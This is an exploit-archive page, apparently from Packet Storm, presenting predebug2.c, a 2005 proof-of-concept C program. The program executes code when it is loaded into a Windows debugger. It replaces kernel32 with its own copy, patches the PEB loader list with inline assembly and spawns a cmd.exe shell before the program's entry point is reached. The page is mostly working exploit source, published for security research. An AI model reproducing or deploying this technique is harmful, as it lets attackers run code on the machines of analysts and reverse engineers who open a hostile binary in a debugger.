exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

predebug2.c

predebug2.c
Posted Apr 20, 2005
Authored by Brett Moore SA | Site security-assessment.com

Example predebug code execution exploit, demonstrating how programmers being loaded into debuggers can attack the machine running the debugger.

tags | exploit, code execution
SHA-256 | 33ca07cc4db8f94578af6e6aae40cf6f4c90465438674f0c1438b9825c9a1273

predebug2.c

Change Mirror Download
/* 
-------------------------------------------------------------------------
- PREDEBUG 2 - The Kernel32 DLL Replacement
-
- Sample showing code execution upon loading in a debugger
- PREDEBUG loads its own copy of kernel32 which alters the
- entry address, removes the copy and loads the real
- kernel32.dll
-
- When compiled and loaded into a debugger, this code will
- cause a cmd.exe shell to be started before the executables
- entry point is reached.
-
- Needs to be compiled without optimisation
-
- brett.moore@security-assessment.com
-------------------------------------------------------------------------
*/
#define _WIN32_WINNT 0x501
#include <stdio.h>
#include <windows.h>
// Included From winternl.h
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;
VOID (__stdcall *LdrLoadDl)(
IN PWCHAR PathToFile OPTIONAL,
IN ULONG Flags OPTIONAL,
IN PUNICODE_STRING ModuleFileName,
OUT PHANDLE ModuleHandle );
VOID (__stdcall *LdrUnloadDll)(
HINSTANCE pInstance
);
VOID (__stdcall *RtlInitUnicodeString)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);

void predebug()
{
HMODULE hMod;
UNICODE_STRING nString;
STARTUPINFO si;
PROCESS_INFORMATION pi;
// Grab the API addresses we require
hMod = GetModuleHandle("ntdll.dll");
LdrLoadDl = (void *) GetProcAddress(hMod, "LdrLoadDll");
LdrUnloadDll = (void *) GetProcAddress(hMod, "LdrUnloadDll");
RtlInitUnicodeString = (void *) GetProcAddress(
hMod,"RtlInitUnicodeString");
// Init the unicode string
RtlInitUnicodeString(&nString,L"kernel32.dll");
// Removes the 'system dll' check
_asm{
mov esi,fs:0x30 // Get Peb
add esi,0x0c // Move to PPROCESS_MODULE_INFO
lodsd // Get the pointer into EAX
mov esi,[eax + 0x1c] // InInitializationOrderModuleList
lodsd // Grab Next Pointer in eax
mov word ptr [eax+0x28],01 // Overwrite the 'load count'
}
// Get the address of our dll
hMod = GetModuleHandle("predebug.dll");
// Unload it
LdrUnloadDll(hMod);
// Load the real kernel32.dll
LdrLoadDl(NULL,NULL,&nString,&hMod);
// We are now in a state where we can execute code normally
GetStartupInfo(&si);
CreateProcess("c:\\winnt\\system32\\cmd.exe", NULL, NULL,
NULL, TRUE,CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
ExitProcess(1);
}

int main(int argc, char *argv[])
{
printf("Hello World....\n");
}
Login or Register to add favorites

File Archive:

November 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    1 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    0 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    219 Files
  • 14
    Nov 14th
    19 Files
  • 15
    Nov 15th
    66 Files
  • 16
    Nov 16th
    38 Files
  • 17
    Nov 17th
    9 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    11 Files
  • 22
    Nov 22nd
    56 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    36 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    14 Files
  • 28
    Nov 28th
    30 Files
  • 29
    Nov 29th
    35 Files
  • 30
    Nov 30th
    25 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close